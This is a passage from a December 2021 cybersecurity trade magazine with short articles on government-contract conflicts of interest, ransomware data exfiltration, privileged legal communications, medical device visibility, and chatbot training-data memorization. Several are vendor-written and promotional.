As the cases discussed above illustrate, an OCI can be devastating <strong>for</strong> a company. However, in many<br />
situations, the adverse effects of an OCI can be avoided by proactively implementing an OCI mitigation<br />
plan. To be effective, a mitigation plan must be tailored to a specific contract opportunity and the<br />
circumstances that give rise to the actual or potential OCI(s). Nonetheless, there are some general<br />
principles that may guide the development of a plan:<br />
• An unequal access to in<strong>for</strong>mation OCI is the easiest type of OCI to mitigate. The objective is to<br />
limit access to and dissemination of competitively useful nonpublic in<strong>for</strong>mation. Mitigation<br />
techniques include nondisclosure agreements, firewalls, document controls, and restricting<br />
personnel assignments.<br />
• An impaired objectivity OCI is more difficult to mitigate. A firewall or other types of in<strong>for</strong>mation<br />
controls will not mitigate an impaired objectivity OCI. Using a separate division to per<strong>for</strong>m<br />
problematic tasks will not mitigate the OCI. Instead, an impaired objectivity OCI may be mitigated<br />
by using a firewalled subcontractor who reports directly to the government or using objective<br />
3 L-3 Services., Inc., B-400134.11, B-400134.12, Sept. 3, 2009, 2009 CPD 171.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 90<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
assessment criteria <strong>for</strong> the tasks <strong>for</strong> the problematic tasks. Recusal may also be an option. All of<br />
these techniques require government cooperation.<br />
• A biased ground rules OCI is also difficult to mitigate. Firewalls or even using a different division<br />
are insufficient because anyone who works <strong>for</strong> the contractor will be presumed to act in the<br />
contractor’s interest. For this reason, recusal or using a firewalled subcontractor are often seen<br />
as the only viable strategies.<br />
For all of these mitigation strategies, proactive OCI identification, prior to bidding on the contract, is<br />
critical.<br />
Conclusion<br />
In a world where the government is acquiring more and more IT and cybersecurity products and services,<br />
the potential <strong>for</strong> overlapping requirements – and OCIs – increases. Contractors operating in these<br />
sectors should be attuned to OCIs and the associated risks. In many cases, if a potential OCI is identified<br />
early and handled proactively, its impact on future opportunities can be mitigated or negated. To take<br />
critical proactive actions, the contractor must understand what an OCI is and how an OCI arises. Armed<br />
with this in<strong>for</strong>mation, a contractor may retain hard-won contracts and avoid exclusion because of OCIs.<br />
About the Author<br />
Michelle Litteken is Of Counsel with the Government Contracts<br />
Practice Group in Morris, Manning & Martin LLP’s Washington,<br />
D.C. office. She helps clients understand and successfully<br />
navigate all aspects of government contracts by using creative<br />
and practical measures. Ms. Litteken regularly advises her<br />
clients at every stage of the process, from understanding the<br />
requirements and securing the contract, to defending the bid,<br />
as well as assisting with potential issues that may arise<br />
during contract per<strong>for</strong>mance. She can be reached<br />
at mlitteken@mmmlaw.com.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 91<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Is Anti Data Exfiltration the Holy Grail of <strong>Cyber</strong>attack<br />
Prevention?<br />
By Dr. Darren Williams, Founder & CEO, BlackFog, Inc.<br />
Despite organizations continuing to invest heavily in the latest cybersecurity solutions, and the realization<br />
that AV solutions are not able to defend against most new attack vectors, cyberattacks are at an all-time<br />
high. This year has witnessed an unparalleled number of attacks which has devasted infrastructure,<br />
governments, and businesses alike, and is expected to cost more than 6 trillion dollars globally. With<br />
access to so many cybersecurity tools, why are we losing the battle? Why are existing solutions so<br />
ineffective? Is Anti Data Exfiltration the Holy Grail of cyberattack prevention?<br />
To understand the problem, it is important to look at the lifecycle of an attack in order to devise counter<br />
measures to protect against them. Since the 1980’s the general approach to attacks has not changed.<br />
The theory is pretty simple, once an attack has occurred, identify the code that caused the damage and<br />
create a fingerprint (a signature in cybersecurity parlance). Store the signatures in a database and<br />
distribute it to all customers, and upon execution check if it exists. If it does, prevent execution and remove<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 92<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
the file. This was a great technique that worked well <strong>for</strong> many years until the threat actors developed<br />
fileless and polymorphic attacks (code that changes dynamically and has no signature).<br />
Traditionally, the focus of cyberattacks was disruption and bragging rights, very few focused on the<br />
economics of making money directly from the endeavor. Until the rise of cryptocurrency in the early part<br />
of the century (2009 to be precise) it was difficult <strong>for</strong> cybercriminals to make money directly from an<br />
attack. Often it was state sponsored attacks that fueled growth. The economics focused around the loss<br />
of business or the negative impact on stock prices from the attack or pump-and-dump schemes that<br />
influenced the price of stocks short term.<br />
<strong>Cyber</strong>crime changed <strong>for</strong>ever in 2013 when the first successful ransomware appeared. Dubbed<br />
CryptoLocker, it was enclosed as an email attachment and encrypted most files on the target device,<br />
offering to decrypt only when a ransom was paid. Thanks to cryptocurrency the payments were virtually<br />
impossible to track. This was the beginning of a new era and one that continues to reach new highs every<br />
year.<br />
In <strong>2021</strong> we have seen devasting attacks across the globe. The top cyberattacks of <strong>2021</strong> such as CNA<br />
Financial, Colonial Pipeline and JBS Foods helped raise awareness and capture the minds of<br />
governments and citizens alike. Ransomware attacks are now so prevalent that TV shows regularly<br />
develop plotlines around ransomware, recent examples include “The Good Doctor” and “9-1-1”.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 93<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Ransomware has also evolved from those early days, while initially focusing on encryption, it has now<br />
moved to triple and even quadruple extortion. The focus of these new attacks is less about encryption,<br />
but rather other mechanisms of making money. The typical strategies these gangs employ to make<br />
money include.<br />
1. Direct encryption: Encrypt files on the device and display a paywall which requires a<br />
cryptocurrency payment be<strong>for</strong>e decryption takes place.<br />
2. Data Extortion: Instead of encrypting files, cybercriminals exfiltrate data from the device in the<br />
background, sending data to command and control (C2) servers in <strong>for</strong>eign countries like Russia<br />
and China. A small sample of the files are published on the Dark Web as evidence and is available<br />
<strong>for</strong> sale to other third parties.<br />
3. Attack Notification: Prior to launching a cyberattack, ransomware gangs sell the in<strong>for</strong>mation about<br />
a pending attack to third parties who can use the in<strong>for</strong>mation to short stocks or any other means<br />
of making money from this advance notice.<br />
4. Cryptojacking: In addition to stealing data, new ransomware variants also include the ability to<br />
mine cryptocurrency and effectively make money by hijacking the CPU of the host device. This<br />
allows cyber criminals to make money while avoiding the massive energy costs associated with<br />
cryptocurrency mining. Because cryptojacking involves data exfiltration this is often overlooked<br />
by traditional security solutions.<br />
These new attacks are highly coordinated by well-resourced gangs that have business models and even<br />
channel operations like a traditional business. If you want to launch an attack you can contact the gangs<br />
directly to license their software and you must provide a percentage of the ransom paid.<br />
The one common factor with these new approaches is they all involve some <strong>for</strong>m of data exfiltration. For<br />
any of these attacks to be successful data must be exfiltrated from the device. In fact, of the 244 reported<br />
ransomware attacks this year, 83.3% threatened to exfiltrate data.<br />
New data from Osterman Research reveals that despite significant investment in tools like data loss<br />
prevention, organizations still struggle with cyberattacks and the prevention of data exfiltration. In<br />
addition, an overwhelming majority of respondents (62%) reported that they have weak confidence in<br />
their current solution’s ability to prevent data exfiltration or prevent ransomware (55%). This provides<br />
clear evidence that most organizations are missing an important piece in their approach to cybersecurity.<br />
Existing technology is ineffective in protecting what has arguably become a business’s most valuable<br />
asset, the data itself. It’s clear that more needs to be done to ensure organizations are able to lock down<br />
their critical in<strong>for</strong>mation in the face of mounting attacks. And it’s not just external cyber adversaries that<br />
pose a risk. The majority of organizations (59%) lack confidence in their current solutions ability to prevent<br />
insiders from exfiltrating data, and nearly half (41%) have experienced an employee’s mistake resulting<br />
in data exfiltration. The human element cannot be overlooked when it comes to security – especially in<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 94<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
the wake of the pandemic where the blurred lines between corporate and personal lives leaves critical<br />
assets more vulnerable than ever be<strong>for</strong>e.<br />
The consequences of having inadequate tools can be catastrophic, with companies’ sensitive data<br />
becoming compromised and their reputation often being damaged irreparably. For companies that are<br />
hit by a ransomware attack consumer trust is often severely impacted, with 23% of consumers reporting<br />
they would stop doing business with a company that paid a ransom, and 48% indicating it was a great<br />
concern and they would seriously consider stopping business with the company entirely. It is there<strong>for</strong>e<br />
critical to have both a data protection strategy and the tools in place <strong>for</strong> anti data exfiltration the new holy<br />
grail in cyberattack prevention.<br />
About the Author<br />
Dr. Williams is a serial entrepreneur and founder of several tech<br />
startups, most recently BlackFog, which has pioneered Anti Data<br />
Exfiltration (ADX) in the fight against cybercrime. Dr. Williams<br />
holds a Ph.D. and Bachelor of Science with Honors from the<br />
University of Melbourne.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 95<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Attorney-Client Privilege Communication Best Practices<br />
By Nicole Allen, Marketing Executive, Salt Communications.<br />
On a daily basis, corporate counsel and their clients communicate confidentially. Assumptions regarding<br />
what is and will remain attorney-client privileged are included in these interactions. Attorney-client<br />
privilege, one of the oldest legal concepts in Anglo-American jurisprudence, is facing a paradigm shift<br />
with today’s rapid work culture advancement. While technological innovation has allowed <strong>for</strong> faster and<br />
more effective communication and production, it has also increased the risk of losing attorney-client<br />
privilege. Given the speed and complexity of today's corporate environment, maintaining confidentiality,<br />
which is a core element of this privilege, is positioned to become an accidental and unrecognised<br />
casualty.<br />
As a result of this shift, in-house legal counsel must become more knowledgeable about an already<br />
complex legal system while navigating a range of cloud collaboration programmes and other types of<br />
electronic communication. In-house counsel should review the following recommended practices to<br />
preserve privilege and protect confidentiality in a modern business setting.<br />
Attorney-Client Privilege & In-House Counsel<br />
The attorney-client privilege protects oral and written communications to, from, or with an attorney <strong>for</strong> the<br />
purpose of asking or receiving legal advice. It is one of the more sophisticated but well-respected areas<br />
of legal practice.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 96<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Certain communications are protected from disclosure to third parties under the attorney-client privilege.<br />
These conversations must be confidential, between an attorney and a client, and made <strong>for</strong> the purpose<br />
of getting or providing legal advice to qualify <strong>for</strong> this protection. If these three pieces of criteria aren't met,<br />
the communication isn't considered valuable. The overarching goal of this privilege is to encourage open<br />
communication and in<strong>for</strong>mation sharing in order to seek legal counsel without fear of unintentional<br />
exposure.<br />
Best practices <strong>for</strong> legal professionals<br />
Attorney-client privilege is still one of the more difficult and subtle aspects of legal practice. The corporate<br />
entity – with employees, business units, and governing boards – adds to the intricacy of this privilege <strong>for</strong><br />
corporate counsel. The fact that in-house counsel serves as both a trusted legal expert and a business<br />
advisor further complicates the matter.<br />
Despite the fact that there is minimal case law specifically dealing with privilege and communication<br />
plat<strong>for</strong>ms or tools, established privilege rules apply. Courts use the modified subject matter test to<br />
evaluate whether a communication is protected by the attorney-client privilege. When a corporate<br />
employee communicates with the corporate attorney about legal advice, the subject matter is within the<br />
scope of the employee's duties, the employee's superior incentivises the employee to make the request,<br />
and only those who need to know the contents of the communication receive it, meaning the<br />
communication is protected.<br />
Take time to educate yourself<br />
Model Rule 1.1, which stipulates that a lawyer "should keep aware of changes in the law and its practise,<br />
including benefits and hazards connected with applicable technology," has been approved by the<br />
American Bar Association and various states. As a result, lawyers are expected to be aware of the<br />
hazards and benefits of technology and to make judicious use of it.<br />
BYOD Policies<br />
BYOD (bring your own device) policies can be written to provide some protection against certain dangers.<br />
The usage of a BYOD smartphone or tablet by employees blurs the barrier between personal and<br />
professional life. In comparison to a thumb drive, a BYOD device can readily keep trade secrets on the<br />
device itself or via a cloud storage service. The expectation of privacy of an employee is at the heart of<br />
the legal issue. The most <strong>for</strong>ward-thinking businesses will create a detailed, customised BYOD strategy<br />
that works in tandem with existing security measures. Employees who use a BYOD smartphone or tablet<br />
in conjunction with business computers would have to sign away their expectation of privacy in more<br />
restricted regimes.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 97<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Bring-your-own-device rules appear to reduce company expenditures on the surface, but they come with<br />
a slew of hidden costs, including issues with attorney-client privilege. Companies with a BYOD policy<br />
have less control over the devices and are constrained in their capacity to implement proper security.<br />
Furthermore, businesses have less control over in<strong>for</strong>mation access and how it is sent and stored on<br />
personal devices, which could be problematic in terms of confidentiality and attorney-client privilege.<br />
Secure your communications<br />
Counsel should make certain that communications are sent to the appropriate people. If irrelevant<br />
individuals are included in confidential communications, it may be more difficult to demonstrate that<br />
privilege applies. This approach applies to all kinds of communication, including new messaging tools<br />
such as Slack and agile project management plat<strong>for</strong>ms such as Jira and Trello. Despite the ease and<br />
efficiencies offered by many current plat<strong>for</strong>ms, the legal system is straining to keep up with such rapid<br />
technological advancement.<br />
Salt is a secure communications solution that provides the best armour available to protect and secure<br />
in<strong>for</strong>mation when communicating on mobile and desktop devices. As a proven safe haven network it<br />
provides the highest security available <strong>for</strong> both law firms and their clients. Mobile communications present<br />
major privacy challenges <strong>for</strong> the legal industry. Client-attorney privileged discussions, confidential<br />
merger/acquisition details, and integral legal strategies are just a few examples of mobile<br />
communications that have been intercepted and used to the perpetrator’s advantage.<br />
The trend away from traditional face to face meetings with clients towards real-time messaging<br />
applications like WhatsApp and Zoom, risks highly sensitive in<strong>for</strong>mation being shared on a less secure<br />
open plat<strong>for</strong>m. There are many media reports of security breaches on consumer-oriented plat<strong>for</strong>ms such<br />
as the recent Pegasus based attacks. If you fear a hack by malign actors who may be motivated by<br />
political, economic, personal, or ethical reasons, then it is essential to protect the internal and external<br />
communications of the firm from attack and exploitation, in a bid to protect the value content of the<br />
in<strong>for</strong>mation, as well as your attorney-client privilege.<br />
Overall, if you're not certain that your message is only sent to people who need to know, consider<br />
modifying your communication delivery strategy to alleviate or reduce your concerns. Through a<br />
dedicated Management Portal, Salt allows you to create closed, private communication groups between<br />
you, your colleagues, and your clients. No uninvited users can contact you via Salt. No uninvited users<br />
can attack or hack you via Salt. You have control and can be seen to protect your clients and internal<br />
communications.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 98<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
At Salt Communications we work with attorneys of all sizes all around the world to enable them to have<br />
secure, confidential discussions wherever they are, at any time.<br />
To discuss this article in greater detail with the team, or to sign up <strong>for</strong> a free trial of Salt Communications<br />
contact us on info@saltcommunications.com or visit our website at saltcommunications.com.<br />
About Salt Communications:<br />
Salt Communications is a multi-award winning cyber security company providing a fully enterprisemanaged<br />
software solution giving absolute privacy in mobile communications. It is easy to deploy and<br />
uses multi-layered encryption techniques to meet the highest of security standards. Salt Communications<br />
offers ‘Peace of Mind’ <strong>for</strong> Organisations who value their privacy, by giving them complete control and<br />
secure communications, to protect their trusted relationships and stay safe. Salt is headquartered in<br />
Belfast, N. Ireland, <strong>for</strong> more in<strong>for</strong>mation visit Salt Communications.<br />
About the Author<br />
Nicole Allen, Marketing Executive at Salt Communications.<br />
Nicole has been working within the Salt Communications<br />
Marketing team <strong>for</strong> several years and has played a crucial role<br />
in building Salt Communications reputation. Nicole implements<br />
many of Salt Communications digital ef<strong>for</strong>ts as well as managing<br />
Salt Communications presence at events, both virtual and in<br />
person events <strong>for</strong> the company.<br />
Nicole can be reached online at (LINKEDIN, TWITTER or by<br />
emailing nicole.allen@saltcommunications.com) and at our<br />
company website https://saltcommunications.com/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 99<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Line-of-Sight <strong>Cyber</strong>security Problem in Healthcare<br />
Why device visibility is hard to get but so worth it<br />
By Samuel Hill, Director of Product Marketing, Medigate<br />
The pandemic shed light on a big problem in healthcare. Most healthcare delivery organizations don’t<br />
accurately know their clinical assets, where they’re located, and whether they’re being used efficiently.<br />
The frantic search <strong>for</strong> ventilators, IV pumps, and other critical equipment needed to treat COVID-19<br />
patients highlighted the issue, but it’s a problem that’s been around <strong>for</strong> quite a while.<br />
Every now and again, there’s a story about nurses looking <strong>for</strong> and hiding equipment so they know where<br />
something is when they need it. MedWrench reports “up to 40% of healthcare technology management<br />
staff (HTM) time is spent on non-value-added work such as: searching <strong>for</strong> equipment, assessing<br />
unbroken assets due to operator error, and juggling the details of multiple vendor contracts.”<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 100<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
And it’s only getting worse. If you’re wondering how big this problem really is, it’s enormous when you<br />
consider there are approximately 15 million medical devices in U.S. hospitals today with billions of IoMT<br />
devices, experts believe, on the way. There’s no easy fix because highly detailed device in<strong>for</strong>mation is<br />
extremely difficult to come by.<br />
Data silos and disconnects<br />
Traditional computerized maintenance management systems (CMMS), which help HDOs track and<br />
manage their inventory, aren’t actually connected to the devices they manage and don’t have access to<br />
live traffic, so they don’t consistently know location, utilization, or other vital device details. IT asset<br />
management (ITAM) and configuration management databases (CMDB), which organizations use to<br />
track and manage their IT assets, don’t offer much relief. While they can dynamically capture in<strong>for</strong>mation<br />
on the networked assets in the environment, they lack visibility and understanding of medical devices.<br />
That is, they can tell you the IP address of a device, what ports it’s connecting to, and maybe even what<br />
type of device it is (e.g., an IV pump or an MRI machine); however, the classifications are often incorrect.<br />
They can’t tell you what modules are attached to a device (e.g., syringe module on an IV pump). They<br />
can’t tell you anything about serially attached medical devices that don’t have an Ethernet connection.<br />
They can’t tell you what proprietary protocols are being used, what embedded software is on the device,<br />
how often that device is used, where it’s located, or any anomalies in the network traffic.<br />
As a result, BioMed, clinical engineering, and maintenance teams need to spend a lot of time trying to fill<br />
in their inventory gaps. Un<strong>for</strong>tunately, this usually means HTMs are stuck wandering their halls to collect<br />
needed in<strong>for</strong>mation. It also means a lot of the data is outdated almost as soon as it’s captured because<br />
most devices rarely remain in one place. This creates huge blind spots that can lead to costly and<br />
dangerous operational omissions.<br />
What are the risks to healthcare organizations?<br />
It may seem overblown to say that these in<strong>for</strong>mational holes pose a danger to a health system’s<br />
operations, but they do. Silos can lead to inefficient workflows, gaps in operational oversight, and other<br />
organizational risks. At best, if left unaddressed, these disconnects add costs and delays to the business<br />
that can make it challenging to offer connected care; at worst, they can generate failures or disruptions<br />
in care which affect a health system’s integrity, reputation, and long-term economic viability.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 101<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Getting specific about what HDOs need in device visibility and insights<br />
CMMS data deficits must be resolved quickly, accurately, and continuously. Creating a single source of<br />
device data truth goes a long way to supporting ongoing risk abatement and workflow efficiencies that<br />
help keep operations secure. To achieve this, HDOs need to feed their CMMS dynamic in<strong>for</strong>mation and<br />
validate it against existing CMMS data fields. This level of dynamic in<strong>for</strong>mation should include specific<br />
details on the device model, make, OS version, network status, security posture, utilization, and location.<br />
There<strong>for</strong>e, data solutions need to apply advanced deep packet inspection (DPI) techniques combined<br />
with vast medical expertise, so they can identify and capture relevant device details and consider the<br />
clinical context in which these devices are operating. Clinical context, after all, is crucial because medical<br />
devices are not like other IT devices.<br />
For example, most clinical devices are closed systems, and AV or security agents cannot be downloaded<br />
to protect them. They run proprietary or legacy software that can’t be patched unless approved and<br />
authorized by the manufacturer. This means vulnerabilities may persist, and devices may be open to<br />
exploit <strong>for</strong> the duration of the patch/fix process. They also often leverage proprietary or clinical protocols<br />
to communicate, so to identify activity that could pose a threat, these protocols need to be fluently<br />
understood.<br />
Since most clinical devices serve a specific function and act a certain way, they’re much more predictable<br />
than general computer systems controlled by people. However, this is only useful if the workflows and<br />
manufacturer-defined behaviors of the specific device are known. HDOs are unique because they require<br />
solutions with a level of knowledge that don’t produce a lot of false alarms on activity that is perfectly<br />
normal (and necessary) <strong>for</strong> a medical device’s operation.<br />
Probably the most important (and somewhat obvious) thing to be mindful of is that clinical devices are<br />
used in procedures and treatment plans, so protective measures cannot be disruptive. If access to a<br />
ventilator is blocked or an IV pump is prevented from communicating with a patient monitor simply<br />
because it was moved, powered up, or made a new connection, an unnecessary point of failure is<br />
introduced that can impact patient care and outcomes. All these things need to be considered and<br />
accommodated in device management and security decisions.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 102<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The benefits are great<br />
When HDOs have real-time visibility and insights into their inventory, they can start to streamline and<br />
mature their security, BioMed, and IT workflows to lower risks and costs. For instance, they can use<br />
device location and utilization in<strong>for</strong>mation to understand front-line care team preferences, improve patch<br />
planning, and optimize asset distributions, which can ultimately generate significant CAPEX and OPEX<br />
benefits.<br />
With a wide-angle view of where devices are used, HDOs can determine when to purchase new<br />
equipment or even reallocate devices from under-utilized locations to optimize capacity and meet needs.<br />
They can consider the risk posture of devices in their buying, renting, and leasing decisions; automate<br />
vulnerability correlations to pinpoint impacted devices (e.g., with an OS version-specific problem,<br />
outdated firmware, vulnerable application entity, etc.); and trigger associated remediation work orders<br />
that reduce the overall risk to operations.<br />
Automating device data collection and management routines allows HDOs to make data-driven decisions<br />
that increase their security posture, improve the lifecycle of their fleet, and drive operational savings. It’s<br />
essential not only <strong>for</strong> the sanity of HTMs (no more frantic searches <strong>for</strong> equipment) but also the HDO at<br />
large – benefiting their patients, balance sheet, and ongoing operations.<br />
About the Author<br />
Samuel is the Director of Product Marketing <strong>for</strong> Medigate.<br />
Be<strong>for</strong>e working in technology, he spent seven years as an<br />
emergency room tech <strong>for</strong> two different health systems and lived<br />
through an EHR transition twice! He is a husband to one, father<br />
to four, and lives on a rural island near Seattle, WA when he is<br />
not camping. He holds a B.A. from Pacific Lutheran University<br />
and an M.A. in Strategic Leadership from Life Pacific University.<br />
Samuel Hill can be reached online at samuel@medigate.io or @samueljhill and at our company website<br />
http://www.medigate.io<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 103<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Caution: Personal Data Memorization in Progress<br />
How a Korean chatbot’s privacy scandal can in<strong>for</strong>m your chatbot’s privacy success<br />
By Patricia Thaine, Co-Founder & CEO, Private AI<br />
On April 2nd, <strong>2021</strong>, SLATE published a story titled A South Korean Chatbot Shows Just How Sloppy<br />
Tech Companies Can Be With User Data. It covered a privacy breach by ScatterLab, a South Korean<br />
chatbot company who was “accused [...] of collecting intimate conversations between lovers without<br />
in<strong>for</strong>ming the users and then using the data to build a conversational A.I. chatbot” (source). This incident,<br />
where the chatbot was “exposing people’s names, nicknames, and home addresses in its responses,”<br />
(source) happened despite warnings from the privacy and Natural Language Processing (NLP) research<br />
community that language models (which are used in chatbots, automatic speech recognition, sentiment<br />
analysis and countless other NLP tasks) memorize rare in<strong>for</strong>mation within their training data. Previously,<br />
“ScatterLab had boasted about its large dataset of 10 billion intimitate conversation logs” (source).<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 104<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
4 Pillars of Privacy-Preserving AI<br />
Understanding the privacy challenges that chabots face requires, first and <strong>for</strong>emost, a general<br />
understanding of what the privacy challenges are <strong>for</strong> machine learning systems in general. There are<br />
four pillars to privacy-preserving AI:<br />
1) Training data privacy: making sure that you can’t reconstruct sensitive or personal in<strong>for</strong>mation<br />
within the training data,<br />
2) Input privacy: privacy of the individual whose data you’re inferring upon,<br />
3) Model weights privacy: privacy of the model of a particular corporation, institution, or individual<br />
who created it. This is about IP protection, but also training data privacy, since it is possible to<br />
determine in<strong>for</strong>mation about the training data from model weight updates,<br />
4) Output privacy: also about protecting the privacy of the individual whose data you’re inferring<br />
upon.<br />
By collecting private conversations with identifiable individuals and training their models on them,<br />
ScatterLab first violated (2) input privacy, then (1) training data privacy, and possibly (4) output privacy.<br />
Training Data Privacy<br />
Much of research and development these days focuses on training data privacy, in part because of how<br />
likely deep learning models are to memorize training data, with the potential of spewing it out in production<br />
to unknown parties. The secret sharer: Evaluating and testing unintended memorization in neural<br />
networks [Nicholas Carlini, Chang Liu, Úlfar Erlingsson, Jernej Kos, and Dawn Song. 2019. The<br />
secret sharer: Evaluating and testing unintended memorization in neural networks. In 28th<br />
USENIX Security Symposium, pages 267–284, Santa Clara, CA. USENIX Association.] by Carlini et<br />
al. (2019) is a pivotal paper discussing the problem. They placed a fake social security number into the<br />
Penn Treebank dataset as a canary and then trained a character language model on the dataset. They<br />
then measured the perplexity of various sequences of numbers and found that the model was less<br />
surprised to see the sequences of numbers that made up the canary; i.e., the language model had<br />
recorded that it was more likely to encounter the canary rather than other random numbers given the<br />
training data. This is a problem because it shows that the language model memorized the secret.<br />
Another paper titled Extracting training data from large language models by Carlini at al. (2020)<br />
demonstrates how GPT-2 was actually memorizing data from the pre-training dataset. [Nicholas Carlini,<br />
Florian Tramer, Eric Wallace, Matthew Jagielski, Ariel Herbert-Voss, Katherine Lee, Adam<br />
Roberts, Tom Brown, Dawn Song, Ulfar Erlingsson, et al. 2020. Extracting training data from large<br />
language models. arXiv preprint arXiv:2012.07805.] It had memorized addresses, names, and other<br />
in<strong>for</strong>mation that could be considered sensitive had the data not been publically available. It is important<br />
to keep in mind that these very models will be memorizing that same kind of in<strong>for</strong>mation from chatbot<br />
training data. The paper showed that an extra large GPT-2 model already started memorizing in<strong>for</strong>mation<br />
after seeing only 33 examples.<br />
Privacy issues have also been raised about training non-contextual word embeddings on data containing<br />
sensitive in<strong>for</strong>mation in Exploring the privacy-preserving properties of word embeddings: Algorithmic<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 105<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
validation study by Abdalla et al. (2020) [Mohamed Abdalla, Moustafa Abdalla, Graeme Hirst, and<br />
Frank Rudzicz. 2020. Exploring the privacy-preserving properties of word embeddings:<br />
Algorithmic validation study. J Med Internet Res.].<br />
There are four types of disclosure concerns when it comes to protecting data privacy:<br />
●<br />
●<br />
●<br />
●<br />
Identity disclosure: identifying an individual.<br />
Attribute disclosure: identifying an individual’s ethnicity, religion, physical attributes, etc.<br />
Group attribute disclosure: e.g., is a particular group more likely to have cancer?<br />
Membership disclosure: e.g., is this person part of a pharmaceutical trial?<br />
Not all attributes are the same with regards to increasing the risk of these disclosures. Within<br />
conversations with chatbots, users might reveal direct identifiers (e.g., full names, exact addresses,<br />
phone numbers, credit card numbers) and quasi-identifiers (e.g., religion, origin, gender, etc.). When<br />
combining quasi-identifiers together, the risk of re-identifying an individual grows exponentially.<br />
The ScatterLab incident mentioned above is an example of identity and possibly attribute disclosure,<br />
though one major issue was actually membership disclosure through identity disclosure. These<br />
disclosure types were caused by the leak of direct identifiers and perhaps of quasi-identifiers as well.<br />
Preventing Identity, Attribute, and Membership Disclosures<br />
There are a few solutions <strong>for</strong> dealing with training data memorization within chatbots. One is differentially<br />
private gradient descent (DPGD), which was used in Carlini et al.’s 2019 paper. DPGD adds noise to the<br />
ML model training process. The original idea behind differential privacy is to be able to make<br />
generalizations about a population without the risk of disclosing any specific individual’s unique<br />
in<strong>for</strong>mation. The goal of adding differential privacy to an algorithm, like a chatbot model, is that if you run<br />
the algorithm on two datasets differing by a single entry, then the likelihood of getting a different set of<br />
possible outputs is negligible. DPGD provides mathematical guarantees that rare in<strong>for</strong>mation is not being<br />
memorized by a machine learning model, though often at the expense of model utility.<br />
Another solution is highly accurate redaction or de-identification, which means removing the direct<br />
identifiers and quasi-identifiers within your training data (e.g., location, names, telephone numbers, etc.).<br />
There’s a lot you can gather from a conversation’s context without the need <strong>for</strong> identifiable in<strong>for</strong>mation.<br />
Finally, another option is using synthetic personal data generation. This method allows <strong>for</strong> replacement<br />
of direct and quasi-identifiers in a very natural way, so a chatbot’s training data matches the style of the<br />
language model’s pre-training dataset, which prevents downstream model accuracy loss. It also has the<br />
additional benefit that, if any personally identifiable in<strong>for</strong>mation is missed, it’s very difficult to tell what the<br />
original data was from the synthetic data. Targeted synthetic data generation changes the paradigm of<br />
disclosure risk versus data utility.<br />
If ScatterLab had used either one of these three methods to protect the privacy of their users, they would<br />
have prevented violating training data privacy, as well as input and output privacy. Their story inspires<br />
